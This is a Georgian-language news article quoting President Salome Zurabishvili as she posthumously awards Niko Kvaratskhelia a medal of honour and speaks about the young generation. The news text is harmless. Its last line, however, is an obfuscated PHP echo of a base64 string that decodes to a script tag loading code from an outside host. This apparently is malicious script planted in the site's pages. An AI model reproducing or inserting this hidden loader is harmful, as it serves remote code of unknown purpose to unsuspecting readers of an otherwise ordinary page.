celsiusi
ავერსი საქკაბელი

 არ ვიცი, როგორც პრეზიდენტს, რამდენი დღე დამრჩა, მაგრამ ჩემთვის ღირებული იქნება, რომ ნიკო კვარაცხელიას დედისთვის ჯილდოს გადაცემა ჩემთვის ჯილდოს ბოლოჯერ გადაცემა იყოს, – ამის შესახებ საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა ორბელიანების სასახლეში განაცხადა, სადაც ნიკო კვარაცხელია გარდაცვალების შემდეგ ღირსების მედლით დააჯილდოვა.

როგორც სალომე ზურაბიშვილმა აღნიშნა, დღეს სიმბოლური და მნიშვნელოვანი დღეა.

„არ ვიცი, რამდენი დღე დამრჩა, როგორც პრეზიდენტს, მაგრამ ჩემთვის ღირებული იქნება, როგორც არ უნდა დამთავრდეს ეს ყველაფერი, ეს იყოს ჩემთვის ჯილდოს ბოლოჯერ გადაცემა, ასეთი მნიშვნელოვანი ადამიანისთვის, ასევე თაობისთვის. ცხადია, ეს დღე იმ ახალგაზრდის ხსოვნას მიეძღვნება, რომელმაც მოკლე დროში ბევრი შეძლო და ძალიან ბევრი დაუტოვა თავის მეგობრებს, ოჯახს და თავის თაობას. ასეთი მაგალითები არის ის, რითაც ჩვენ ვიზრდებით, რითაც საზოგადოება არსებობს. რაც ყველაზე უფრო გვიჭირს დღევანდელ დღეს, ეს არის დანახვა, რომ საზოგადოებას აქვს თავისი სიცოცხლის უნარი. პარადოქსია, რომ ზოგჯერ გარდაცვალება მოიცავს უზარმაზარ სიცოცხლის უნარს. ჩვენი ქვეყნის ისტორია ალბათ სწორედ ამაშია, რომ ყველაზე დიდი ტრაგედიებიდან იწყება ახალი ეტაპი, ახალი ძალა, ახალი ენერგია. ეს რომ არა, აქ არ ვიქნებოდით დღემდე. არ მინდა, დღეს ტრაგედიად განვიცადოთ ის, რაც ნამდვილად ოჯახისა და მეგობრებისთვის ტრაგედიაა და ამას ვერაფერი წაშლის, მაგრამ ამ ტრაგედიის იქით მინდა, დავინახო ის ახალი თაობა, რომელიც მოდის, რომელიც ყველაფერს ფლობს, სადაც არ უნდა იყოს.

ვიცით, რომ უცხოეთში იყო გაზრდილი, იქ ჰქონდა განათლება მიღებული, მოიარა ბევრი ქვეყანა და ეს არის დღევანდელი დღის მოცემულობა, რომ არავინ არის ერთ ადგილზე, ის, რომ არ მოძრაობდეს და არ ხედავდეს მსოფლიოს. ამითი ვართ ჩვენ დღევანდელი მსოფლიოს ნაწილი. ჩაკეტილობა, არასდროს არ იყო ჩვენთვის მიმზიდველი და არ იქნება. დიდი იმედი მაქვს, ეს ახალგაზრდები მაინც ჩათვლიან, რომ ეს ქვეყანა მათი ქვეყანაა და აქ არის პერსპექტივა მათთვის, რომ არ ჩაიქნევენ ხელს და არ იფიქრებენ, რომ მხოლოდ სხვაგან უნდა მონახონ ახალი პერსპექტივა. ეს ჩვენი, ვინც აქ ვართ და ვისაც გვაქვს პასუხისმგებლობა, ეს ჩვენი გასაკეთებელია, რომ ისევ დაინახონ, ამ ქვეყნას სჭირდება თავისი ახალგაზრდობა, ნიჭიერი ახალგაზრდები, ისეთი ახალგაზრდები, რომლებიც შორს იჭვრიტებიან და ხედავენ, რომ ახალი მსოფლიო იქმნება და ამის გაგებაც აქვთ. მისი ცხოვრება სამწუხაროდ, ძალიან მალე დასრულდა და დანარჩენი ჩვენ, ყველას დაგვიტოვა გასაკეთებლად“, – განაცხადა პრეზიდენტმა.

253
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");